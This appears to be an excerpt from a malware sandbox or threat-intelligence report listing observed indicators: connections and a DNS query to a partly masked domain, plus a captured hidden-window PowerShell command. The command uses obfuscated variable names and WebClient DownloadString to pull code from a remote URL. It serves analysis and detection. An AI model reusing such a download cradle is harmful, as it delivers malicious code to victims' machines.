Technical Information
- $cwtagtlwfxpufctdigdplcpxehiylrm
- 'bo####hcompany.com':443
- 'bo####hcompany.com':443
- DNS ASK bo####hcompany.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $CWtagtLwFXPuFCTDiGdpLcpxeHiYlrM='https://boxtechcompany.com/1/GetData.php?13193';$crRlrZZDtouNGvmQhFVfvIOTLNEN=(New-Object System.Net.WebClient).DownloadString($CWtagtLwFXPu...' (with hidden window)